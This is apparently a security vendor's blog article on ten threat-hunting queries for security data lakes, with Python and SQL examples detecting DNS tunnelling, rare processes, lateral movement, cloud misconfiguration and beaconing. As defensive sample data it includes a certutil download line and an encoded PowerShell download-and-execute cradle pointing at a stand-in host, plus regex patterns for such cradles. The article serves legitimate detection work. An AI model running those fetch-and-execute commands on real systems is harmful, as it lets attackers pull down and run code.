10 Essential Threat Hunting Queries Every Security Lake Should Run
Threat hunting today has evolved from a reactive exercise into a proactive discipline that can mean the difference between detecting an intrusion early and discovering a breach months after the fact. With security data lakes now centralising telemetry from across your entire estate, the challenge is no longer about having enough data but rather knowing which queries will surface the threats that matter.
At the heart of effective threat hunting lies the ability to ask the right questions of your data. Whether you are leveraging Amazon Security Lake, building your own data lake infrastructure, or working with normalised schemas like OCSF, certain queries consistently prove their value in detecting sophisticated threats. This article explores ten essential threat hunting queries that every security operations team should be running regularly against their security lake.
Why Query-Based Threat Hunting Matters
Before diving into specific queries, it is worth understanding why this approach is so powerful. Security data lakes aggregate vast quantities of telemetry from endpoints, networks, cloud services, and applications. This creates an opportunity to correlate events across traditionally siloed data sources, but only if you know what patterns to look for.
Effective queries serve multiple purposes. They establish baselines of normal behaviour, identify anomalies that warrant investigation, uncover indicators of compromise that might otherwise remain hidden, and provide evidence for incident response and forensics. The queries we outline here have been selected based on their proven ability to detect real-world attack techniques mapped to the MITRE ATT&CK framework.
1. Unusual Outbound DNS Queries
DNS remains a favourite vector for attackers to exfiltrate data or to establish command and control channels. This query identifies DNS requests to newly registered domains, domains with suspicious characteristics, or an unusual volume of requests from a single source.
Look for DNS queries to domains registered within the last 30 days, requests containing excessive subdomain lengths (often used in DNS tunnelling), or endpoints making significantly more DNS queries than their baseline. These patterns frequently indicate data exfiltration or malware beaconing.
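The three checks just described, as an added example that is not part of the original article and not any vendor's query pack. It uses SQLite in place of the lake's query engine (Athena over OCSF tables behaves the same for these clauses), constructed DNS Activity rows with simplified OCSF-style field names, a constructed domain-registration feed, and a constructed per-source baseline; `registrable_domain` takes the last two labels as a stand-in for a Public Suffix List lookup, and the 40-character and 3.5-bit thresholds are illustrative starting points to tune.

```python
import math
import sqlite3
from collections import Counter

NOW = 1700003600            # "current" time for the hunt (epoch seconds)
THIRTY_DAYS = 30 * 86400

# Constructed OCSF-style DNS Activity rows: (time, src_endpoint_ip, query_hostname).
DNS_EVENTS = [
    (1700000000, "10.0.0.5", "www.example.com"),
    (1700000010, "10.0.0.5", "mail.example.com"),
    (1700000020, "10.0.0.7", "cdn.example.net"),
    # long, high-entropy leftmost labels, the shape DNS tunnelling produces (constructed)
    (1700000030, "10.0.0.9", "a3f9c1e7b2d84f0c9e1a7b3d5f6c8e2a4b6d8f0c1e3a5b7d.tunnel-example.invalid"),
    (1700000040, "10.0.0.9", "9b1d3f5a7c9e0b2d4f6a8c0e2b4d6f8a1c3e5b7d9f1a3c5e.tunnel-example.invalid"),
    (1700000050, "10.0.0.9", "c7e9a1b3d5f7c9e1b3d5f7a9c1e3b5d7f9a1c3e5b7d9f1a3.tunnel-example.invalid"),
    (1700000060, "10.0.0.11", "login.newly-registered.invalid"),
]

# Constructed enrichment: registration time per registrable domain, as a WHOIS feed would supply.
DOMAIN_AGE = [
    ("example.com", 800000000),
    ("example.net", 800000000),
    ("tunnel-example.invalid", 1699000000),
    ("newly-registered.invalid", 1699900000),
]

# Constructed baseline: median DNS queries per hour per source over the previous 30 days.
BASELINE = [("10.0.0.5", 40), ("10.0.0.7", 30), ("10.0.0.9", 1), ("10.0.0.11", 20)]


def registrable_domain(hostname):
    """Last two labels. Assumption for this example; use the Public Suffix List in production."""
    return ".".join(hostname.split(".")[-2:])


def first_label_entropy(hostname):
    """Shannon entropy in bits per character of the leftmost label."""
    label = hostname.split(".")[0]
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def build_db():
    """Load the constructed tables into an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("first_label_entropy", 1, first_label_entropy)  # entropy as a SQL UDF
    conn.execute("CREATE TABLE dns_activity (time INTEGER, src_endpoint_ip TEXT, "
                 "query_hostname TEXT, registrable_domain TEXT)")
    conn.executemany("INSERT INTO dns_activity VALUES (?,?,?,?)",
                     [(t, ip, h, registrable_domain(h)) for t, ip, h in DNS_EVENTS])
    conn.execute("CREATE TABLE domain_age (domain TEXT, registered_at INTEGER)")
    conn.executemany("INSERT INTO domain_age VALUES (?,?)", DOMAIN_AGE)
    conn.execute("CREATE TABLE baseline (src_endpoint_ip TEXT, hourly_median INTEGER)")
    conn.executemany("INSERT INTO baseline VALUES (?,?)", BASELINE)
    return conn


# Check 1: lookups of domains registered within the last 30 days.
NEWLY_REGISTERED_SQL = """
SELECT d.time, d.src_endpoint_ip, d.query_hostname
FROM dns_activity d JOIN domain_age a ON a.domain = d.registrable_domain
WHERE ? - a.registered_at < ?
ORDER BY d.time"""

# Check 2: oversized or high-entropy subdomains, the tunnelling signature.
TUNNELLING_SQL = """
SELECT time, src_endpoint_ip, query_hostname
FROM dns_activity
WHERE length(query_hostname) - length(registrable_domain) - 1 > 40
   OR first_label_entropy(query_hostname) > 3.5
ORDER BY time"""

# Check 3: sources querying at three times their hourly baseline or more.
VOLUME_SQL = """
SELECT d.src_endpoint_ip, COUNT(*) AS n, b.hourly_median
FROM dns_activity d JOIN baseline b ON b.src_endpoint_ip = d.src_endpoint_ip
WHERE d.time >= ? - 3600
GROUP BY d.src_endpoint_ip, b.hourly_median
HAVING COUNT(*) >= 3 * b.hourly_median"""


def run_hunt(now=NOW):
    conn = build_db()
    return {
        "newly_registered": conn.execute(NEWLY_REGISTERED_SQL, (now, THIRTY_DAYS)).fetchall(),
        "tunnelling": conn.execute(TUNNELLING_SQL).fetchall(),
        "volume": conn.execute(VOLUME_SQL, (now,)).fetchall(),
    }


if __name__ == "__main__":
    for check, rows in run_hunt().items():
        print(check)
        for row in rows:
            print("  ", row)
```

Registering the entropy function as a UDF keeps the whole check expressible as one query, which matters when the same SQL has to be scheduled in the lake rather than pulled into a notebook.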
2. Authentication Anomalies Across Multiple Sources
Credential compromise remains one of the most common initial access vectors. This query correlates authentication events from multiple sources, including on-premises Active Directory, cloud identity providers, and VPN concentrators, to identify suspicious patterns.
Focus on failed authentication attempts followed by successful logins from different geographic locations, authentications occurring outside normal business hours for specific users, or lateral movement patterns where credentials are being reused across multiple systems in rapid succession. The power of this query lies in its ability to correlate identity events across your entire estate.
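An added example of the two correlations above (failures followed by a success from a different country, and logins outside a user's usual hours), not code from the original article. It assumes a single `auth_events` table into which Active Directory, an IdP and a VPN have been normalised, a constructed `user_hours` table standing in for per-user baselines learned from history, and SQLite as the query engine; the 3-failure and 10-minute thresholds are illustrative.

```python
import sqlite3

DAY = 1700006400   # 2023-11-15T00:00:00Z, so offsets below read as hours of that day

# Constructed events from three sources: (time, user, source, status, country).
AUTH_EVENTS = [
    (DAY + 9 * 3600,       "bob",   "ad",   "failure", "CN"),
    (DAY + 9 * 3600 + 20,  "bob",   "ad",   "failure", "CN"),
    (DAY + 9 * 3600 + 40,  "bob",   "ad",   "failure", "CN"),
    (DAY + 9 * 3600 + 100, "bob",   "vpn",  "success", "GB"),  # success elsewhere right after
    (DAY + 3 * 3600,       "alice", "okta", "success", "US"),  # 03:00 UTC, outside her hours
    (DAY + 10 * 3600,      "carol", "okta", "failure", "US"),
    (DAY + 10 * 3600 + 30, "carol", "okta", "success", "US"),  # one typo then success: normal
    (DAY + 20 * 3600,      "dave",  "vpn",  "success", "US"),  # 20:00 UTC, inside his shift
]

# Constructed per-user working hours in UTC: (user, start_hour, end_hour).
USER_HOURS = [("alice", 8, 18), ("bob", 8, 18), ("carol", 8, 18), ("dave", 14, 23)]

# Successes preceded by >= 3 failures for the same user within 10 minutes,
# at least one of which came from a different country than the success.
SPRAY_THEN_SUCCESS_SQL = """
SELECT s.time, s.user, s.source, s.country,
       COUNT(f.time) AS failures_before,
       COUNT(DISTINCT f.country) AS failure_countries
FROM auth_events s
JOIN auth_events f
  ON f.user = s.user AND f.status = 'failure'
 AND f.time BETWEEN s.time - 600 AND s.time
WHERE s.status = 'success'
GROUP BY s.time, s.user, s.source, s.country
HAVING COUNT(f.time) >= 3
   AND SUM(CASE WHEN f.country <> s.country THEN 1 ELSE 0 END) > 0"""

# Successful logins outside the user's own baseline hours.
OFF_HOURS_SQL = """
SELECT e.time, e.user, e.source,
       CAST(strftime('%H', e.time, 'unixepoch') AS INTEGER) AS hour
FROM auth_events e JOIN user_hours u ON u.user = e.user
WHERE e.status = 'success'
  AND (CAST(strftime('%H', e.time, 'unixepoch') AS INTEGER) < u.start_hour
       OR CAST(strftime('%H', e.time, 'unixepoch') AS INTEGER) >= u.end_hour)"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE auth_events (time INTEGER, user TEXT, source TEXT, "
                 "status TEXT, country TEXT)")
    conn.executemany("INSERT INTO auth_events VALUES (?,?,?,?,?)", AUTH_EVENTS)
    conn.execute("CREATE TABLE user_hours (user TEXT, start_hour INTEGER, end_hour INTEGER)")
    conn.executemany("INSERT INTO user_hours VALUES (?,?,?)", USER_HOURS)
    return conn


def run_hunt():
    conn = build_db()
    return {
        "spray_then_success": conn.execute(SPRAY_THEN_SUCCESS_SQL).fetchall(),
        "off_hours": conn.execute(OFF_HOURS_SQL).fetchall(),
    }


if __name__ == "__main__":
    for check, rows in run_hunt().items():
        print(check, rows)
```

Bob's failures arrive from Active Directory and his success from the VPN; the self-join only works because both sources share the `user` column after normalisation, which is the whole point of running this in the lake rather than in either product's console.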
3. Rare Process Executions
Attackers often use uncommon or living-off-the-land binaries (LOLBins) to evade detection. This query establishes a baseline of process executions across your endpoints and flags processes that are statistically rare.
Examine processes that have executed on fewer than one per cent of your endpoints, binaries running from unusual locations such as temp directories or user profiles, or legitimate system tools being invoked with suspicious command line arguments. This approach is particularly effective at catching fileless attacks and post-exploitation activities.
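The prevalence, location and argument checks above as an added example (not the article's own code). A one-per-cent prevalence test only makes sense over a sizeable fleet, so the block constructs 200 endpoints' worth of process events; the LOLBin argument patterns are two illustrative entries of the kind found in public detection rule sets, and SQLite stands in for the lake's engine.

```python
import sqlite3

# Constructed fleet of 200 endpoints.
HOSTS = [f"ws-{i:03d}" for i in range(200)]


def constructed_events():
    """Rows of (host, process_name, file_path, cmdline). Every host runs the common
    binaries; a handful run something rarer; one host runs two unusual things."""
    rows = []
    for h in HOSTS:
        rows.append((h, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe"))
        rows.append((h, "svchost.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"))
    for h in HOSTS[:150]:
        rows.append((h, "teams.exe", r"C:\Program Files\Teams\teams.exe", "teams.exe"))
    for h in HOSTS[10:15]:   # certutil used for ordinary certificate checks by a few admins
        rows.append((h, "certutil.exe", r"C:\Windows\System32\certutil.exe",
                     "certutil.exe -verify cert.cer"))
    # ws-007: a system tool with download-style arguments, and an unknown binary run from Temp
    rows.append(("ws-007", "certutil.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"))
    rows.append(("ws-007", "updater.exe",
                 r"C:\Users\jsmith\AppData\Local\Temp\updater.exe", "updater.exe /silent"))
    return rows


# Constructed (process_name, LIKE pattern) pairs for legitimate tools invoked oddly.
LOLBIN_PATTERNS = [("certutil.exe", "%-urlcache%"), ("regsvr32.exe", "%/i:http%")]

# Processes seen on fewer than 1 % of the fleet.
RARE_SQL = """
WITH fleet AS (SELECT COUNT(DISTINCT host) AS n_hosts FROM process_events),
     prevalence AS (SELECT process_name, COUNT(DISTINCT host) AS hosts_seen
                    FROM process_events GROUP BY process_name)
SELECT p.process_name, p.hosts_seen, f.n_hosts
FROM prevalence p CROSS JOIN fleet f
WHERE p.hosts_seen * 100.0 / f.n_hosts < 1.0
ORDER BY p.hosts_seen"""

# Binaries executing from temp directories or user profiles (raw string: backslashes are literal).
LOCATION_SQL = r"""
SELECT host, process_name, file_path FROM process_events
WHERE file_path LIKE '%\Temp\%' OR file_path LIKE 'C:\Users\%'"""

# Known tools with argument patterns that do not match their everyday use.
ARGS_SQL = """
SELECT e.host, e.process_name, e.cmdline
FROM process_events e JOIN lolbin_patterns p
  ON p.process_name = e.process_name AND e.cmdline LIKE p.pattern"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE process_events (host TEXT, process_name TEXT, "
                 "file_path TEXT, cmdline TEXT)")
    conn.executemany("INSERT INTO process_events VALUES (?,?,?,?)", constructed_events())
    conn.execute("CREATE TABLE lolbin_patterns (process_name TEXT, pattern TEXT)")
    conn.executemany("INSERT INTO lolbin_patterns VALUES (?,?)", LOLBIN_PATTERNS)
    return conn


def run_hunt():
    conn = build_db()
    return {
        "rare": conn.execute(RARE_SQL).fetchall(),
        "unusual_location": conn.execute(LOCATION_SQL).fetchall(),
        "suspicious_args": conn.execute(ARGS_SQL).fetchall(),
    }


if __name__ == "__main__":
    for check, rows in run_hunt().items():
        print(check, rows)
```

Note that `certutil.exe` is not rare here (six of 200 hosts); only the argument check singles out the one invocation that looks wrong, which is why prevalence alone is not enough for living-off-the-land tooling.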
4. Privileged Account Activity Outside Normal Patterns
Administrator and service accounts represent high-value targets. This query tracks the behaviour of privileged accounts and alerts when they deviate from established patterns.
Monitor for privileged accounts accessing resources they have never touched before, service accounts authenticating interactively when they should only be used programmatically, or admin accounts performing actions outside their typical schedule. Many advanced persistent threat actors spend weeks studying normal operations before making their move, so baseline deviations are critical indicators.
5. Lateral Movement via Administrative Shares
Once inside a network, attackers often move laterally using Windows administrative shares. This query identifies suspicious SMB activity that could indicate lateral movement.
Look for accounts accessing admin shares across multiple systems within short timeframes, unusual source-destination pairs based on your network architecture, or file transfers over SMB that do not match typical administrative activities. When enriched with asset criticality data, this query becomes even more powerful at prioritising threats.
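An added example of the fan-out and source-destination checks, with the asset-criticality enrichment the paragraph mentions; it is not the article's code. It assumes SMB share-access events normalised to `(time, src_user, src_host, dst_host, share)`, a constructed asset inventory with a role and a 1-3 criticality score, 10-minute buckets as a cheap substitute for a true sliding window, and the rule (an assumption about this environment) that workstations should not be opening administrative shares on other workstations.

```python
import sqlite3

BASE = 1700006400   # 2023-11-15T00:00:00Z; a multiple of the 600 s bucket used below

# Constructed asset inventory: (host, role, criticality 1-3).
ASSETS = [
    ("backup01", "server", 2), ("ws-042", "workstation", 1), ("ws-007", "workstation", 1),
    ("ws-019", "workstation", 1), ("hr-ws-03", "workstation", 2), ("dc01", "server", 3),
    ("fs01", "server", 2), ("app01", "server", 2),
] + [(f"srv-{i:02d}", "server", 1) for i in range(8)]

# Constructed SMB share-access events: (time, src_user, src_host, dst_host, share).
SMB_EVENTS = (
    # nightly backup job touching eight servers' C$ fifteen minutes apart: routine
    [(BASE + 900 * i, "svc-backup", "backup01", f"srv-{i:02d}", "C$") for i in range(8)]
    # one user opening ADMIN$ on six hosts within two minutes from a workstation
    + [(BASE + 3600 + 20 * i, "jdoe", "ws-042", dst, "ADMIN$")
       for i, dst in enumerate(["dc01", "fs01", "app01", "ws-007", "ws-019", "hr-ws-03"])]
)

# Accounts reaching admin shares on >= 5 distinct hosts inside one 10-minute bucket,
# enriched with the highest criticality among the hosts touched.
FANOUT_SQL = """
SELECT e.src_user, e.src_host, (e.time / 600) * 600 AS window_start,
       COUNT(DISTINCT e.dst_host) AS hosts_hit,
       MAX(a.criticality) AS top_criticality
FROM smb_events e JOIN assets a ON a.host = e.dst_host
WHERE e.share IN ('ADMIN$', 'C$')
GROUP BY e.src_user, e.src_host, e.time / 600
HAVING COUNT(DISTINCT e.dst_host) >= 5"""

# Source-destination pairs that the architecture says should not exist.
UNUSUAL_PAIRS_SQL = """
SELECT e.time, e.src_user, e.src_host, e.dst_host, e.share
FROM smb_events e
JOIN assets s ON s.host = e.src_host
JOIN assets d ON d.host = e.dst_host
WHERE s.role = 'workstation' AND d.role = 'workstation'
ORDER BY e.time"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE assets (host TEXT, role TEXT, criticality INTEGER)")
    conn.executemany("INSERT INTO assets VALUES (?,?,?)", ASSETS)
    conn.execute("CREATE TABLE smb_events (time INTEGER, src_user TEXT, src_host TEXT, "
                 "dst_host TEXT, share TEXT)")
    conn.executemany("INSERT INTO smb_events VALUES (?,?,?,?,?)", SMB_EVENTS)
    return conn


def run_hunt():
    conn = build_db()
    return {
        "fanout": conn.execute(FANOUT_SQL).fetchall(),
        "unusual_pairs": conn.execute(UNUSUAL_PAIRS_SQL).fetchall(),
    }


if __name__ == "__main__":
    for check, rows in run_hunt().items():
        print(check, rows)
```

The backup account touches more hosts in total than `jdoe` but never more than one per bucket, so it stays below the threshold; `top_criticality` of 3 (the domain controller) is what lifts the `jdoe` hit to the top of the queue. Fixed buckets can split a burst that straddles a boundary, so production queries usually run the same check with offset buckets or a window function.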
6. Cloud Resource Modifications
As organisations increasingly rely on cloud infrastructure, attackers target cloud resources for persistence and data access. This query monitors for unauthorised or suspicious changes to cloud configurations.
Track security group modifications that open new ingress rules, changes to IAM policies that grant excessive permissions, or the creation of new users or roles outside change management windows. Pay particular attention to modifications made from unusual geographic locations or by accounts that do not typically perform administrative actions.
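The four conditions above over CloudTrail-shaped management events, as an added example that is not the article's code. The records are constructed and carry only the fields the hunt reads; `sourceCountry` is assumed to have been added by a geo-IP enrichment step (CloudTrail itself records `sourceIPAddress`), and the admin list, usual countries and change window are constructed stand-ins for an organisation's own reference data.

```python
import json
from datetime import datetime, timezone

# Constructed CloudTrail-style events (subset of fields; requestParameters shapes follow CloudTrail).
EVENTS = [
    {"eventTime": "2023-11-15T10:05:00Z", "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"userName": "netops-admin"}, "sourceCountry": "GB",
     "requestParameters": {"groupId": "sg-0abc", "ipPermissions": {"items": [
         {"fromPort": 22, "toPort": 22, "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventTime": "2023-11-15T02:40:00Z", "eventName": "CreateUser",
     "userIdentity": {"userName": "dev-ci"}, "sourceCountry": "US",
     "requestParameters": {"userName": "backup-svc2"}},
    {"eventTime": "2023-11-15T11:00:00Z", "eventName": "PutUserPolicy",
     "userIdentity": {"userName": "dev-ci"}, "sourceCountry": "RU",
     "requestParameters": {"userName": "backup-svc2", "policyDocument":
         '{"Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'}},
    {"eventTime": "2023-11-15T14:10:00Z", "eventName": "CreateRole",
     "userIdentity": {"userName": "iam-admin"}, "sourceCountry": "GB",
     "requestParameters": {"roleName": "lambda-exec"}},
]

ADMIN_PRINCIPALS = {"netops-admin", "iam-admin"}            # constructed
USUAL_COUNTRIES = {"GB", "US"}                              # constructed
CHANGE_WINDOWS = [("2023-11-15T13:00:00Z", "2023-11-15T16:00:00Z")]  # constructed
IDENTITY_CREATION = {"CreateUser", "CreateRole", "CreateAccessKey"}
POLICY_WRITES = {"PutUserPolicy", "PutRolePolicy", "PutGroupPolicy"}
ADMIN_ACTIONS = {"AuthorizeSecurityGroupIngress"} | IDENTITY_CREATION | POLICY_WRITES


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def opens_ingress_to_world(params):
    """True if any ipRanges entry in an ingress rule is 0.0.0.0/0 or ::/0."""
    for perm in params.get("ipPermissions", {}).get("items", []):
        for rng in perm.get("ipRanges", {}).get("items", []):
            if rng.get("cidrIp") in ("0.0.0.0/0", "::/0"):
                return True
    return False


def grants_wildcard(policy_document):
    """True if an Allow statement covers Action "*" on Resource "*"."""
    doc = json.loads(policy_document)
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for st in statements:
        actions = st.get("Action", [])
        resources = st.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        if st.get("Effect") == "Allow" and "*" in actions and "*" in resources:
            return True
    return False


def in_change_window(when):
    return any(parse_time(a) <= when < parse_time(b) for a, b in CHANGE_WINDOWS)


def analyse(event):
    """Return the reasons an event is suspicious; empty for routine changes."""
    reasons = []
    name, params = event["eventName"], event.get("requestParameters", {})
    when, actor = parse_time(event["eventTime"]), event["userIdentity"].get("userName")
    if name == "AuthorizeSecurityGroupIngress" and opens_ingress_to_world(params):
        reasons.append("open_ingress")
    if name in POLICY_WRITES and grants_wildcard(params.get("policyDocument", "{}")):
        reasons.append("wildcard_policy")
    if name in IDENTITY_CREATION and not in_change_window(when):
        reasons.append("outside_change_window")
    if name in ADMIN_ACTIONS and actor not in ADMIN_PRINCIPALS:
        reasons.append("non_admin_principal")
    if event.get("sourceCountry") not in USUAL_COUNTRIES:
        reasons.append("unusual_country")
    return reasons


def hunt(events=EVENTS):
    return [(e["eventName"], e["userIdentity"].get("userName"), analyse(e))
            for e in events if analyse(e)]


if __name__ == "__main__":
    for finding in hunt():
        print(finding)
```

The `dev-ci` principal produces two findings that reinforce each other: a user created outside the change window, then a wildcard policy attached to it from an unusual country. Correlating on the created principal's name across the two events is the natural next query.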
7. Data Staging Activities
Before exfiltration, attackers often stage large quantities of data in staging directories. This query identifies unusual data aggregation patterns that could indicate preparation for theft.
Monitor for the creation of archive files (ZIP, RAR, 7z) outside normal backup schedules, unusual amounts of data being copied to external storage locations, or rapid access to numerous sensitive files by a single account. The key is understanding what normal data handling looks like in your organisation.
8. Suspicious PowerShell and Command Line Activity
PowerShell and other scripting languages are frequently weaponised by attackers for various post-exploitation activities. This query examines command line telemetry for indicators of malicious scripting.
Focus on obfuscated command lines using base64 encoding or unusual character patterns, scripts attempting to download content from the internet, or the invocation of methods commonly used in attack frameworks. When combined with process ancestry information, this query can map out entire attack chains.
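An added example of the command-line checks above, combined with the parent-process context the paragraph ends on; it is not the article's code. It assumes process-creation events normalised to `host`, `parent_name`, `process_name` and `cmdline`, decodes `-EncodedCommand` arguments (base64 over UTF-16LE, as PowerShell expects) before matching, and uses an indicator list of the kind found in public detection content; the sample events are constructed, with the encoded payload built at import time so that it decodes to a readable download-and-execute string.

```python
import base64
import binascii
import re

# Download-and-execute indicators, matched against both raw and decoded command lines.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b"
    r"|FromBase64String|Net\.WebClient", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                        re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def constructed_encoded_command(text):
    """Encode text the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(text.encode("utf-16le")).decode("ascii")


# Constructed process-creation events.
EVENTS = [
    {"host": "ws-01", "parent_name": "explorer.exe", "process_name": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"host": "ws-02", "parent_name": "winword.exe", "process_name": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + constructed_encoded_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"host": "srv-01", "parent_name": "services.exe", "process_name": "powershell.exe",
     "cmdline": r"powershell.exe -Command Get-Service | Export-Csv C:\reports\svc.csv"},
    {"host": "ws-03", "parent_name": "cmd.exe", "process_name": "powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest -Uri https://updates.example.invalid/x.zip -OutFile x.zip"},
]


def decode_encoded_command(blob):
    """Return the decoded script text, or None if the blob is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyse(event):
    """Return the list of reasons this event is suspicious (empty when benign)."""
    reasons, cmd, decoded = [], event["cmdline"], None
    match = ENCODED_RE.search(cmd)
    if match:
        reasons.append("encoded_command")
        decoded = decode_encoded_command(match.group(1))
    searchable = cmd + ("\n" + decoded if decoded else "")
    if CRADLE_RE.search(searchable):
        reasons.append("download_cradle")
    if event["parent_name"].lower() in OFFICE_PARENTS:
        reasons.append("office_parent")   # scripting spawned by a document reader
    return reasons


def hunt(events=EVENTS):
    """(host, reasons, decoded text or None) for every event that trips at least one check."""
    findings = []
    for e in events:
        reasons = analyse(e)
        if reasons:
            m = ENCODED_RE.search(e["cmdline"])
            findings.append((e["host"], reasons, decode_encoded_command(m.group(1)) if m else None))
    return findings


if __name__ == "__main__":
    for host, reasons, decoded in hunt():
        print(host, reasons, decoded)
```

Decoding before matching is what separates a usable query from a noisy one: the raw `-enc` blob contains none of the indicator strings, and without the parent-process field `ws-03` and `ws-02` would look similar even though only one was spawned by a document reader.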
9. Anomalous Network Traffic Patterns
Even with encrypted connections, traffic metadata can reveal malicious behaviour. This query analyses network flow data for patterns inconsistent with normal operations.
Identify unusual port combinations, connections to IP addresses with poor reputations or associated with threat intelligence feeds, or traffic volume spikes from endpoints that do not normally generate significant network activity. Beaconing patterns, where connections occur at regular intervals, are particularly indicative of command-and-control traffic.
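An added example of beacon detection from flow metadata and of the threat-intelligence join, not code from the original article. It assumes flow records reduced to `(time, src_ip, dst_ip, dst_port)` and a constructed indicator list; the beacon test is the usual one, a low coefficient of variation of inter-arrival times over enough connections, with the 8-connection and 0.2 thresholds as illustrative values to tune against your own traffic.

```python
import statistics
from collections import defaultdict

START = 1700006400   # epoch seconds; all constructed flows are offsets from here


def constructed_flows():
    """Flow records (time, src_ip, dst_ip, dst_port). Constructed, not captured."""
    flows = []
    # 10.0.0.9 -> 203.0.113.7:443 roughly every 60 s with slight jitter: a beacon-like rhythm
    t = START
    for gap in [60, 62, 59, 63, 60, 58, 61, 62, 60]:
        flows.append((t, "10.0.0.9", "203.0.113.7", 443))
        t += gap
    flows.append((t, "10.0.0.9", "203.0.113.7", 443))
    # 10.0.0.5 browsing 198.51.100.20: bursty, human-shaped timing
    for offset in [0, 5, 8, 60, 300, 310, 900, 1500, 1502, 4000]:
        flows.append((START + offset, "10.0.0.5", "198.51.100.20", 443))
    # only two connections, but to an address on the indicator list
    flows.append((START + 100, "10.0.0.7", "192.0.2.44", 8443))
    flows.append((START + 5000, "10.0.0.7", "192.0.2.44", 8443))
    return flows


THREAT_INTEL_IPS = {"192.0.2.44"}   # constructed indicator feed


def find_beacons(flows, min_connections=8, max_cv=0.2):
    """Flag (src, dst, port) tuples whose connection gaps are numerous and regular.
    Returns (src, dst, port, connections, mean_gap_seconds, cv)."""
    by_tuple = defaultdict(list)
    for t, src, dst, port in flows:
        by_tuple[(src, dst, port)].append(t)
    hits = []
    for key, times in by_tuple.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.fmean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean    # coefficient of variation: low = clock-like
        if cv <= max_cv:
            hits.append((*key, len(times), round(mean, 1), round(cv, 3)))
    return hits


def threat_intel_matches(flows, indicators=THREAT_INTEL_IPS):
    """Distinct (src, dst, port) tuples whose destination appears on the indicator list."""
    return sorted({(src, dst, port) for _, src, dst, port in flows if dst in indicators})


if __name__ == "__main__":
    flows = constructed_flows()
    print("beacons:", find_beacons(flows))
    print("threat intel:", threat_intel_matches(flows))
```

The browsing tuple has as many connections as the beacon but a coefficient of variation above 1, so only the regular rhythm is reported; the two-connection pair is caught by the indicator join instead, which is why the checks complement rather than replace each other. Beacons with deliberate jitter push the coefficient upward, so the threshold is a trade-off to revisit against observed traffic.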
10. Indicators of Persistence Mechanisms
Attackers establish persistence to maintain access even after system reboots. This query hunts for common persistence techniques.
Examine new scheduled tasks or cron jobs, modifications to registry run keys or startup folders, and the creation of new services. Additionally, look for changes to authentication mechanisms such as the addition of SSH keys or modifications to PAM configurations. Persistence mechanisms often provide the best evidence of compromise, as they must survive reboots to be effective.
Implementing These Queries in Your Environment
The value of these queries lies not just in their individual capability, but in how they work together to provide comprehensive coverage of attack techniques. When implementing them, consider the following best practices.
Firstly, tune each query to your environment. Generic queries will generate excessive false positives, so invest time in understanding your baselines. Secondly, automate where possible. These queries should run continuously, with results feeding into your SOAR platform or alerting systems. Thirdly, enrich your data. Threat intelligence feeds, asset criticality information, and user context all make these queries more effective.
Finally, document your findings. When a query identifies a genuine threat, record the indicators and refine the query to catch variations of the same technique. Threat hunting is an iterative process that improves with each investigation.
Conclusion
Effective threat hunting requires both the right data and the right questions to ask of that data. Security data lakes provide unprecedented visibility into your security posture, but only if you actively interrogate that data with purposeful queries. The ten queries outlined here represent a solid foundation for any threat hunting programme, covering initial access, lateral movement, persistence, and exfiltration across both on-premises and cloud environments.
As threats evolve, so too must your queries. Treat these as starting points rather than static rules, continuously refining them based on emerging threats, changes in your environment, and lessons learned from each investigation. When implemented consistently and tuned appropriately, these queries will significantly enhance your organisation’s ability to detect and respond to advanced threats before they cause significant harm.
Ready to transform your cyber posture? Contact us today to discover how our intelligent data processing platform can reduce your costs whilst enhancing your security posture.